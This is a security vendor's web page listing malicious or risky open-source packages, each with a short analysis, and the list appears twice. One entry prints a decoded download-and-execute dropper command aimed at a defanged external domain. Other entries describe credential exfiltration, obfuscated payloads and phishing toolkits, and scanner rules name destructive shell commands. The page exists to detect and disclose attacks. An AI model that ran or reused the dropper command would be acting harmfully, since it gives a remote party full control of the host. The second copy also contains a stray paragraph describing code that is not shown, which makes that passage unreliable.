Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.


Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery: timmywil published 4.0.0

left-pad: stevemao published 1.3.0

react: react-bot published 19.2.4

We protect you from vulnerable and malicious packages

sbcli-dev

3.8.79

Live on PyPI

Blocked by Socket

No direct malware code is present in the fragment (no obvious backdoor, reverse shell, or exfiltration implemented in this file itself). However, the module exposes very high-risk functionality: it connects to the Docker API over plaintext TCP, allows client-controlled image pulls and runs containers as privileged with host mounts and host networking, and injects potentially sensitive credentials into container environments. These behaviors make this code a significant supply-chain and host compromise risk if the endpoints are reachable by untrusted users or if DOCKER_IP/docker daemon is exposed. Recommend restricting access, enforcing authentication/authorization, validating image names (or disallowing arbitrary images), using TLS/auth for Docker daemon, removing privileged/host_mode mounts where possible, and avoiding passing untrusted secrets into container environments.

github.com/bishopfox/sliver

v1.5.40-0.20230614192516-4841e46c346b

Live on Go Modules

Blocked by Socket

This file is an HTTP client for the Sliver implant C2 framework. It implements session bootstrapping, encrypted communication, polling, and closing behavior for a remote implant. The code is intentionally designed for covert network communication with a controller and therefore is malicious in the context of normal applications. Specific security concerns include predictable nonces due to math/rand, potential logging of sensitive data when compiled with debug, and in-memory handling of proxy credentials. If found in a package dependency for benign software, it should be considered a high-severity supply-chain compromise and removed or blocked.

ironpython.stdlib

3.4.1

by IronPython Contributors, Python Contributors, IronPython Contributors, Python Contributors

Live on NuGet

Blocked by Socket

This is a mailcap parser/utility that reads mailcap files and constructs shell commands from their entries. The code executes commands via os.system after performing textual substitution using filename, MIME type, and parameters. That behavior is expected for a mailcap implementation, but it represents a high-risk sink: untrusted mailcap files, environment variables, or attacker-controlled filename/plist values can lead to arbitrary command execution (shell injection). The code itself does not contain obfuscated or hidden malware, credentials, or explicit exfiltration; however, using it with untrusted inputs or untrusted mailcap files is dangerous. Recommend treating mailcap files as trusted input only, or replacing os.system usage with safer invocation (e.g., subprocess with argument lists and proper escaping/validation).

blue-button

1.5.1

by kachok

Live on npm

Blocked by Socket

The analyzed code is a standard, well-scoped DOM filtering utility (akin to jQuery/Sizzle). There is no evidence of malicious behavior, backdoors, data exfiltration, or code execution. It interfaces with DOM APIs in controlled ways and does not read sensitive data from environment or network. Overall security risk is low, with no malware indicators detected in this fragment.

devflow-ai

3.0.0-alpha.42-devflow.2

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected

All findings:
[CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4]
[CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4]
[HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4]
[HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4]
[HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4]

This skill's documented behavior is plausible for a hooks/automation system, but its footprint is large and capable of exfiltrating sensitive data if misconfigured or abused. The main issues are missing details about where MCP memory/training data is sent and how authentication/filters are enforced, plus runtime execution via npx and arbitrary custom scripts. I classify this as SUSPICIOUS: not obviously malicious from the documentation alone, but the capabilities and unspecified remote endpoints create a moderate risk of credential/data leakage unless strict safeguards are implemented.

LLM verification: The provided document describes a high-capability automation skill that — if implemented — would have broad access to local files, the ability to execute arbitrary shell commands, perform Git operations, and send data to remote training/orchestration services. The fragment contains no obvious obfuscated code or active backdoors, but the described features present real supply-chain and data-exfiltration risks unless strict allowlists, explicit consent, auditing, and endpoint trust anchors are enf

pycrackhash

0.1.1

Live on PyPI

Blocked by Socket

This module contains high-risk behaviors: it fetches arbitrary code from a remote URL, writes it into common Python installation directories or temp, and executes it as a background subprocess, passing base64-encoded payloads that contain hashes and action metadata. It also posts hashes to remote cracking services. These are supply-chain/backdoor and data-exfiltration capabilities. If you do not explicitly trust the remote endpoint (EXT_URL, PRIMARY_URL, SECONDARY_URL) and the environment where this runs, do not use this package. Consider removing or disabling the remote-fetch/execute behavior (EXT_DISABLE environment variable) and auditing the fetched script before allowing execution.

yizhifabao58

0.0.1-security

by npm

Live on npm

Blocked by Socket

Previously, this file referenced malicious code that posed a risk of unauthorized actions on user systems. The malicious package was removed by the registry’s security team. No specific command-and-control domains or IP addresses are documented. Users who installed the package when it contained malicious code could have been exposed to compromise.

easyship-components

3.9999.99

by yassine-ywh

Removed from npm

Blocked by Socket

This package will execute pre-install.js during npm install. That gives the package the ability to run arbitrary JS on the host, which can perform malicious actions (network calls, telemetry, file system changes, spawning shells, adding git hooks, deleting files, etc.). You must inspect the contents of pre-install.js and any code it loads (including dynamic network fetches, child_process usage, or writes to dotfiles) before installing. Treat this as a moderate-to-high risk until the script is reviewed.

Live on npm for 1 hour and 24 minutes before removal. Socket users were protected even while the package was live.

email-helper

2.0.20230806181812

by righettod

Removed from npm

Blocked by Socket

The code appears to dynamically execute code obtained from network responses based on the system platform. This behavior could be potentially dangerous and should be reviewed further to ensure it does not contain malicious or unauthorized actions.

Live on npm for 31 days and 43 minutes before removal. Socket users were protected even while the package was live.

secondary-market-client-deskent

0.0.12

Live on PyPI

Blocked by Socket

This Python script implements an automated Binance NFT purchasing bot that uses seleniumwire to capture real browser requests to binance[.]com (including session cookies, CSRF tokens, bnc-uuid, fvideo-id, user-agent and a large base64 ‘device-info’ blob). It then packages these credentials—together with proxy login/password, product data, request counts, sale timing and a local license key—and sends them in JSON POSTs over plain HTTP to a remote control server at endpoints such as:
• http://127[.]0[.]0[.]1/scripts/licenses/checklicense
• http://127[.]0[.]0[.]1/scripts/licenses/licenseapprove
• http://127[.]0[.]0[.]1/scripts/products/secondary
• http://127[.]0[.]0[.]1/scripts/products/secondary/results
Because all communications default to unencrypted HTTP and delegate transaction logic to the remote host, an attacker controlling or compromising that host can hijack the user’s Binance session and execute arbitrary NFT purchases. This constitutes credential exfiltration and a remote-controlled backdoor—malicious behavior that poses a high security risk.

namira-account-reactjs

1.6.8

by amir.abolhasani.1368

Removed from npm

Blocked by Socket

The code contains potential security risks due to insufficient input validation and handling of sensitive user data. It is crucial to review and improve the input validation and data handling mechanisms to mitigate these risks.

Live on npm for 5 hours and 4 minutes before removal. Socket users were protected even while the package was live.

reallife

0.1.31

Live on PyPI

Blocked by Socket

This code implements a remote-controlled decorator that queries a hardcoded external HTTP endpoint to decide if a local function should run and optionally notifies that endpoint. The pattern is a high supply-chain and privacy risk: cleartext network calls to a hardcoded IP, no authentication or integrity checks, and remote control of execution. The snippet contains a runtime typo that prevents it from working as written, but the intended behavior is clear and concerning. While there is no direct evidence of data exfiltration in this fragment, the remote kill-switch/telemetry capability makes inclusion of this module risky and it should be treated as suspicious and reviewed/removed unless explicitly required and secured (use HTTPS, authentication, validate responses, and avoid remote kill-switches).

new-npm-packages

999.9.9

by mega707

Removed from npm

Blocked by Socket

The script collects information like package details, directories, hostnames, DNS servers and user information, and sends it to a remote server.

Live on npm for 2 hours and 29 minutes before removal. Socket users were protected even while the package was live.

roboidai

1.1.12

Live on PyPI

Blocked by Socket

This module deliberately obfuscates and executes a concealed Python payload at import/runtime. The use of multiple encoding layers and dynamic eval/compile is a high-risk pattern typical of backdoors or supply-chain malware. Treat this file as suspicious and unsafe to import or execute in any production or sensitive environment. Perform offline decoding and careful static analysis of the decoded payload in an isolated sandbox before any further use.

nphish

0.2.0

Live on PyPI

Blocked by Socket

This code is explicitly a phishing toolkit that automates hosting phishing pages, exposing them via public tunnels (ngrok/cloudflared), and capturing/storing victim credentials and IP information. The presence of an obfuscated base64 payload that is exec()'d is a strong malicious indicator because it allows hidden arbitrary code execution. The package downloads and executes external binaries and untrusted website content without validation. It should be considered malicious for most benign deployment contexts and should not be run in any environment you care about. Use only in controlled, legal, consented penetration testing environments after fully auditing the decoded payload.

mmarchini-oss/npm-otp-publish

21dccdcd432c34a69d584aba3a96071bb69d07a4

Live on GitHub Actions

Blocked by Socket

This entrypoint orchestrates an ephemeral, publicly-exposed web service that advertises its URL externally and accepts a one-time-password which it immediately forwards to an npm-publish helper. That orchestration strongly resembles phishing/capture-and-use tooling for npm account takeover (e.g., capture 2FA OTP and immediately publish). Definitive maliciousness depends on the implementations of Notifier and NpmPublish and on configuration (who receives the ngrok URL, whether OTPs are forwarded to attackers). Treat the package as high risk: review Notifier and NpmPublish code and any configured endpoints or credentials before running. Avoid running this in environments with privileged npm credentials or CI secrets until a full audit of the dependent modules is completed.

meutils

2025.4.29.21.33.50

Live on PyPI

Blocked by Socket

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

vikunja-mcp

0.5.1

Removed from PyPI

Blocked by Socket

The code implements a deliberate local-pip import redirection, enabling execution of a vendored pip from a controlled directory. While this can be legitimate for offline or vendor-provided tooling, it introduces notable supply-chain risk: tampered or malicious local pip content would run with the host process privileges. The pattern should be safeguarded with strict integrity checks (signatures, hashes, or a robust lockfile) and access controls to prevent tampering of PIP_SOURCES_ROOT. If this behavior is unintended, it constitutes a significant security risk.

Live on PyPI for 13 hours and 16 minutes before removal. Socket users were protected even while the package was live.

linxploit

0.1

Live on PyPI

Blocked by Socket

This is a highly dangerous payload registry that, if executed, can cause widespread data loss, system downtime, and potential firmware/kernel compromise. It represents clear malicious risk and should be removed from any benign codebase, with strict access controls and scanning to prevent inadvertent exposure in supply chains. Treat as malware-like content and revoke publishing rights for any packages containing it.

meutils

2025.8.29.20.5.48

Live on PyPI

Blocked by Socket

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

cmpuiforoath

1.1.6

by jpdtest

Removed from npm

Blocked by Socket

The code exhibits behavior consistent with data exfiltration, collecting and sending sensitive system information to a remote server without user consent. This poses a significant security risk.

Live on npm for 13 days, 1 hour and 25 minutes before removal. Socket users were protected even while the package was live.

xync-client

0.0.121

Live on PyPI

Blocked by Socket

This script is high-risk: it automates interactive login flows, captures and persists full browser storage_state (session tokens), and navigates authenticated sessions to banking/payment endpoints. The combination enables account takeover and fraudulent transactions when misused. Treat as malicious or at minimum dangerous automation; require immediate review, restrict execution, and audit any stored agent.state entries. Remediate by removing session persistence, not storing storage_state, and implementing strict access controls and logging.

wix-perf-measure

2.999.999

Removed from npm

Blocked by Socket

The code uses the exec function to run shell commands, which poses a significant security risk. It could potentially execute malicious code if the input to exec is manipulated. Redirecting output to /dev/null to hide execution details is suspicious.

Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.

@techwavedev/agi-agent-kit

1.3.2

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected

All findings:
[CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4]
[HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3]

The instruction set is functionally coherent for converting Stitch designs into modular React components, but contains multiple high-risk operational behaviors: executing an opaque bash helper with an external URL, automatically running npm install/dev (which can execute lifecycle scripts), and granting broad tool permissions (stitch*). These behaviors create realistic supply-chain and remote code execution attack surfaces. Recommended mitigations before executing this skill: validate and whitelist htmlCode.downloadUrl domains, inspect and vet scripts/fetch-stitch.sh content, pin and audit npm dependencies, run installs and validation in a sandboxed/ephemeral environment, restrict tool permissions to the minimum necessary, and require provenance checks for any third-party code (qdrant-memory). Treat the workflow as elevated-risk until those controls are in place.

LLM verification: SUSPICIOUS / POTENTIALLY RISKY — The module's stated purpose (design-to-code conversion) is legitimate, but the provided instructions promote executing an opaque Bash fetch script and running unpinned npm installs and dev scripts on the host. These operations materially increase the attack surface and enable supply-chain or host compromise if inputs or dependencies are malicious or compromised. I do not see clear evidence of intentional malware in the provided fragment, but the workflow requires

@twork-data-services/aggregator-account-get-otb-by-account

1.99.0

by johrdanalfred

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

sbcli-dev

3.8.79

Live on PyPI

Blocked by Socket

No direct malware code is present in the fragment (no obvious backdoor, reverse shell, or exfiltration implemented in this file itself). However, the module exposes very high-risk functionality: it connects to the Docker API over plaintext TCP, allows client-controlled image pulls and runs containers as privileged with host mounts and host networking, and injects potentially sensitive credentials into container environments. These behaviors make this code a significant supply-chain and host compromise risk if the endpoints are reachable by untrusted users or if DOCKER_IP/docker daemon is exposed. Recommend restricting access, enforcing authentication/authorization, validating image names (or disallowing arbitrary images), using TLS/auth for Docker daemon, removing privileged/host_mode mounts where possible, and avoiding passing untrusted secrets into container environments.

github.com/bishopfox/sliver

v1.5.40-0.20230614192516-4841e46c346b

Live on Go Modules

Blocked by Socket

This file is an HTTP client for the Sliver implant C2 framework. It implements session bootstrapping, encrypted communication, polling, and closing behavior for a remote implant. The code is intentionally designed for covert network communication with a controller and therefore is malicious in the context of normal applications. Specific security concerns include predictable nonces due to math/rand, potential logging of sensitive data when compiled with debug, and in-memory handling of proxy credentials. If found in a package dependency for benign software, it should be considered a high-severity supply-chain compromise and removed or blocked.

ironpython.stdlib

3.4.1

by IronPython Contributors,Python Contributors, IronPython Contributors, Python Contributors

Live on NuGet

Blocked by Socket

This is a mailcap parser/utility that reads mailcap files and constructs shell commands from their entries. The code executes commands via os.system after performing textual substitution using filename, MIME type, and parameters. That behavior is expected for a mailcap implementation, but it represents a high-risk sink: untrusted mailcap files, environment variables, or attacker-controlled filename/plist values can lead to arbitrary command execution (shell injection). The code itself does not contain obfuscated or hidden malware, credentials, or explicit exfiltration; however, using it with untrusted inputs or untrusted mailcap files is dangerous. Recommend treating mailcap files as trusted input only, or replacing os.system usage with safer invocation (e.g., subprocess with argument lists and proper escaping/validation).

blue-button

1.5.1

by kachok

Live on npm

Blocked by Socket

The analyzed code is a standard, well-scoped DOM filtering utility (akin to jQuery/Sizzle). There is no evidence of malicious behavior, backdoors, data exfiltration, or code execution. It interfaces with DOM APIs in controlled ways and does not read sensitive data from environment or network. Overall security risk is low, with no malware indicators detected in this fragment.

devflow-ai

3.0.0-alpha.42-devflow.2

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] This skill's documented behavior is plausible for a hooks/automation system, but its footprint is large and capable of exfiltrating sensitive data if misconfigured or abused. The main issues are missing details about where MCP memory/training data is sent and how authentication/filters are enforced, plus runtime execution via npx and arbitrary custom scripts. I classify this as SUSPICIOUS: not obviously malicious from the documentation alone, but the capabilities and unspecified remote endpoints create a moderate risk of credential/data leakage unless strict safeguards are implemented. LLM verification: The provided document describes a high-capability automation skill that — if implemented — would have broad access to local files, the ability to execute arbitrary shell commands, perform Git operations, and send data to remote training/orchestration services. The fragment contains no obvious obfuscated code or active backdoors, but the described features present real supply-chain and data-exfiltration risks unless strict allowlists, explicit consent, auditing, and endpoint trust anchors are enf

pycrackhash

0.1.1

Live on PyPI

Blocked by Socket

This module contains high-risk behaviors: it fetches arbitrary code from a remote URL, writes it into common Python installation directories or temp, and executes it as a background subprocess, passing base64-encoded payloads that contain hashes and action metadata. It also posts hashes to remote cracking services. These are supply-chain/backdoor and data-exfiltration capabilities. If you do not explicitly trust the remote endpoint (EXT_URL, PRIMARY_URL, SECONDARY_URL) and the environment where this runs, do not use this package. Consider removing or disabling the remote-fetch/execute behavior (EXT_DISABLE environment variable) and auditing the fetched script before allowing execution.

yizhifabao58

0.0.1-security

by npm

Live on npm

Blocked by Socket

Previously, this file referenced malicious code that posed a risk of unauthorized actions on user systems. The malicious package was removed by the registry’s security team. No specific command-and-control domains or IP addresses are documented. Users who installed the package when it contained malicious code could have been exposed to compromise.

easyship-components

3.9999.99

by yassine-ywh

Removed from npm

Blocked by Socket

This package will execute pre-install.js during npm install. That gives the package the ability to run arbitrary JS on the host, which can perform malicious actions (network calls, telemetry, file system changes, spawning shells, adding git hooks, deleting files, etc.). You must inspect the contents of pre-install.js and any code it loads (including dynamic network fetches, child_process usage, or writes to dotfiles) before installing. Treat this as a moderate-to-high risk until the script is reviewed.

Live on npm for 1 hour and 24 minutes before removal. Socket users were protected even while the package was live.

email-helper

2.0.20230806181812

by righettod

Removed from npm

Blocked by Socket

The code appears to dynamically execute code obtained from network responses based on the system platform. This behavior could be potentially dangerous and should be reviewed further to ensure it does not contain malicious or unauthorized actions.

Live on npm for 31 days and 43 minutes before removal. Socket users were protected even while the package was live.

secondary-market-client-deskent

0.0.12

Live on PyPI

Blocked by Socket

This Python script implements an automated Binance NFT purchasing bot that uses seleniumwire to capture real browser requests to binance[.]com (including session cookies, CSRF tokens, bnc-uuid, fvideo-id, user-agent and a large base64 ‘device-info’ blob). It then packages these credentials—together with proxy login/password, product data, request counts, sale timing and a local license key—and sends them in JSON POSTs over plain HTTP to a remote control server at endpoints such as: • http://127[.]0[.]0[.]1/scripts/licenses/checklicense • http://127[.]0[.]0[.]1/scripts/licenses/licenseapprove • http://127[.]0[.]0[.]1/scripts/products/secondary • http://127[.]0[.]0[.]1/scripts/products/secondary/results Because all communications default to unencrypted HTTP and delegate transaction logic to the remote host, an attacker controlling or compromising that host can hijack the user’s Binance session and execute arbitrary NFT purchases. This constitutes credential exfiltration and a remote-controlled backdoor—malicious behavior that poses a high security risk.

namira-account-reactjs

1.6.8

by amir.abolhasani.1368

Removed from npm

Blocked by Socket

The code contains potential security risks due to insufficient input validation and handling of sensitive user data. It is crucial to review and improve the input validation and data handling mechanisms to mitigate these risks.

Live on npm for 5 hours and 4 minutes before removal. Socket users were protected even while the package was live.

reallife

0.1.31

Live on PyPI

Blocked by Socket

This code implements a remote-controlled decorator that queries a hardcoded external HTTP endpoint to decide if a local function should run and optionally notifies that endpoint. The pattern is a high supply-chain and privacy risk: cleartext network calls to a hardcoded IP, no authentication or integrity checks, and remote control of execution. The snippet contains a runtime typo that prevents it from working as written, but the intended behavior is clear and concerning. While there is no direct evidence of data exfiltration in this fragment, the remote kill-switch/telemetry capability makes inclusion of this module risky and it should be treated as suspicious and reviewed/removed unless explicitly required and secured (use HTTPS, authentication, validate responses, and avoid remote kill-switches).

new-npm-packages

999.9.9

by mega707

Removed from npm

Blocked by Socket

The script collects information like package details, directories, hostnames, DNS servers and user information, and sends it to a remote server.

Live on npm for 2 hours and 29 minutes before removal. Socket users were protected even while the package was live.

roboidai

1.1.12

Live on PyPI

Blocked by Socket

This module deliberately obfuscates and executes a concealed Python payload at import/runtime. The use of multiple encoding layers and dynamic eval/compile is a high-risk pattern typical of backdoors or supply-chain malware. Treat this file as suspicious and unsafe to import or execute in any production or sensitive environment. Perform offline decoding and careful static analysis of the decoded payload in an isolated sandbox before any further use.

nphish

0.2.0

Live on PyPI

Blocked by Socket

This code is explicitly a phishing toolkit that automates hosting phishing pages, exposing them via public tunnels (ngrok/cloudflared), and capturing/storing victim credentials and IP information. The presence of an obfuscated base64 payload that is exec()'d is a strong malicious indicator because it allows hidden arbitrary code execution. The package downloads and executes external binaries and untrusted website content without validation. It should be considered malicious for most benign deployment contexts and should not be run in any environment you care about. Use only in controlled, legal, consented penetration testing environments after fully auditing the decoded payload.

mmarchini-oss/npm-otp-publish

21dccdcd432c34a69d584aba3a96071bb69d07a4

Live on GitHub Actions

Blocked by Socket

This entrypoint orchestrates an ephemeral, publicly-exposed web service that advertises its URL externally and accepts a one-time-password which it immediately forwards to an npm-publish helper. That orchestration strongly resembles phishing/capture-and-use tooling for npm account takeover (e.g., capture 2FA OTP and immediately publish). Definitive maliciousness depends on the implementations of Notifier and NpmPublish and on configuration (who receives the ngrok URL, whether OTPs are forwarded to attackers). Treat the package as high risk: review Notifier and NpmPublish code and any configured endpoints or credentials before running. Avoid running this in environments with privileged npm credentials or CI secrets until a full audit of the dependent modules is completed.

meutils

2025.4.29.21.33.50

Live on PyPI

Blocked by Socket

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

vikunja-mcp

0.5.1

Removed from PyPI

Blocked by Socket

The code implements a deliberate local-pip import redirection, enabling execution of a vendored pip from a controlled directory. While this can be legitimate for offline or vendor-provided tooling, it introduces notable supply-chain risk: tampered or malicious local pip content would run with the host process privileges. The pattern should be safeguarded with strict integrity checks (signatures, hashes, or a robust lockfile) and access controls to prevent tampering of PIP_SOURCES_ROOT. If this behavior is unintended, it constitutes a significant security risk.

Live on PyPI for 13 hours and 16 minutes before removal. Socket users were protected even while the package was live.
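One way to gate the vendored-pip import redirection described above on an integrity check, added as an example (not vikunja-mcp's own code): a SHA-256 manifest of the vendored tree, generated when the tree is vendored and reviewed like a lockfile, must match the directory exactly before it is prepended to sys.path. The directory and manifest names and the tampering scenario in demo() are assumptions for the example.

```python
"""Hash-manifest gate for a vendored tool directory before it goes on sys.path.

Added example, not vikunja-mcp's code. Assumes a manifest JSON mapping
relative file paths to SHA-256 digests, shipped and reviewed alongside the
lockfile; the import path is only extended if the tree matches it exactly.
"""
import hashlib
import json
import os
import sys
import tempfile


def build_manifest(root: str) -> dict:
    """Hash every regular file under root, keyed by POSIX-style relative path."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                manifest[rel] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def verify_tree(root: str, manifest: dict) -> list:
    """Return (problem, path) pairs; an empty list means the tree matches exactly."""
    actual = build_manifest(root)
    problems = []
    for rel, digest in manifest.items():
        if rel not in actual:
            problems.append(("missing", rel))
        elif actual[rel] != digest:
            problems.append(("modified", rel))
    for rel in actual:
        if rel not in manifest:
            problems.append(("unexpected", rel))  # e.g. a dropped-in sitecustomize.py
    return sorted(problems)


def _load_manifest(path: str) -> dict:
    with open(path, "r", encoding="utf-8") as fh:
        return json.load(fh)


def trusted_sys_path_insert(root: str, manifest_path: str) -> bool:
    """The guarded form of the redirection pattern: verify first, then prepend."""
    if verify_tree(root, _load_manifest(manifest_path)):
        return False
    sys.path.insert(0, root)
    return True


def demo() -> dict:
    """Constructed scenario: a tiny vendored tree, verified clean, then tampered."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "vendored_pip")  # assumed PIP_SOURCES_ROOT
        os.makedirs(os.path.join(root, "pip"))
        with open(os.path.join(root, "pip", "__init__.py"), "w") as fh:
            fh.write("__version__ = '0.0'\n")
        manifest_path = os.path.join(tmp, "vendored.manifest.json")
        with open(manifest_path, "w", encoding="utf-8") as fh:
            json.dump(build_manifest(root), fh)

        clean = verify_tree(root, _load_manifest(manifest_path))
        admitted_clean = trusted_sys_path_insert(root, manifest_path)
        sys.path.remove(root)  # undo for the demo; a real caller keeps it

        # Tamper the way a supply-chain attacker would: alter code that runs on
        # import, and drop an extra module the manifest never listed.
        with open(os.path.join(root, "pip", "__init__.py"), "a") as fh:
            fh.write("# extra line appended by an attacker\n")
        with open(os.path.join(root, "pip", "sitecustomize.py"), "w") as fh:
            fh.write("# dropped in\n")
        tampered = verify_tree(root, _load_manifest(manifest_path))
        admitted_tampered = trusted_sys_path_insert(root, manifest_path)

        return {"clean": clean, "admitted_clean": admitted_clean,
                "tampered": tampered, "admitted_tampered": admitted_tampered}
```

The manifest is only as trustworthy as its own protection: keep it outside the vendored tree and in version control, so that tampering with PIP_SOURCES_ROOT alone cannot also rewrite the digests it is checked against.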

linxploit

0.1

Live on PyPI

Blocked by Socket

This is a highly dangerous payload registry that, if executed, can cause widespread data loss, system downtime, and potential firmware/kernel compromise. It represents clear malicious risk and should be removed from any benign codebase, with strict access controls and scanning to prevent inadvertent exposure in supply chains. Treat as malware-like content and revoke publishing rights for any packages containing it.

meutils

2025.8.29.20.5.48

Live on PyPI

Blocked by Socket

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

cmpuiforoath

1.1.6

by jpdtest

Removed from npm

Blocked by Socket

The code exhibits behavior consistent with data exfiltration, collecting and sending sensitive system information to a remote server without user consent. This poses a significant security risk.

Live on npm for 13 days, 1 hour and 25 minutes before removal. Socket users were protected even while the package was live.

xync-client

0.0.121

Live on PyPI

Blocked by Socket

This script is high-risk: it automates interactive login flows, captures and persists full browser storage_state (session tokens), and navigates authenticated sessions to banking/payment endpoints. The combination enables account takeover and fraudulent transactions when misused. Treat as malicious or at minimum dangerous automation; require immediate review, restrict execution, and audit any stored agent.state entries. Remediate by removing session persistence, not storing storage_state, and implementing strict access controls and logging.

wix-perf-measure

2.999.999

Removed from npm

Blocked by Socket

The code uses the exec function to run shell commands, which poses a significant security risk. It could potentially execute malicious code if the input to exec is manipulated. Redirecting output to /dev/null to hide execution details is suspicious.

Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.

@techwavedev/agi-agent-kit

1.3.2

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected. All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4]; [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3]. The instruction set is functionally coherent for converting Stitch designs into modular React components, but contains multiple high-risk operational behaviors: executing an opaque bash helper with an external URL, automatically running npm install/dev (which can execute lifecycle scripts), and granting broad tool permissions (stitch*). These behaviors create realistic supply-chain and remote code execution attack surfaces. Recommended mitigations before executing this skill: validate and whitelist htmlCode.downloadUrl domains, inspect and vet scripts/fetch-stitch.sh content, pin and audit npm dependencies, run installs and validation in a sandboxed/ephemeral environment, restrict tool permissions to the minimum necessary, and require provenance checks for any third-party code (qdrant-memory). Treat the workflow as elevated-risk until those controls are in place. LLM verification: SUSPICIOUS / POTENTIALLY RISKY. The module's stated purpose (design-to-code conversion) is legitimate, but the provided instructions promote executing an opaque Bash fetch script and running unpinned npm installs and dev scripts on the host. These operations materially increase the attack surface and enable supply-chain or host compromise if inputs or dependencies are malicious or compromised. I do not see clear evidence of intentional malware in the provided fragment, but the workflow requires

@twork-data-services/aggregator-account-get-otb-by-account

1.99.0

by johrdanalfred

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Git dependency

GitHub dependency

AI-detected potential malware

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

Telemetry

Protestware or potentially unwanted behavior

42 more alerts →

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.


Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Even more developer love →
Install GitHub App · Read the docs

Security teams trust Socket

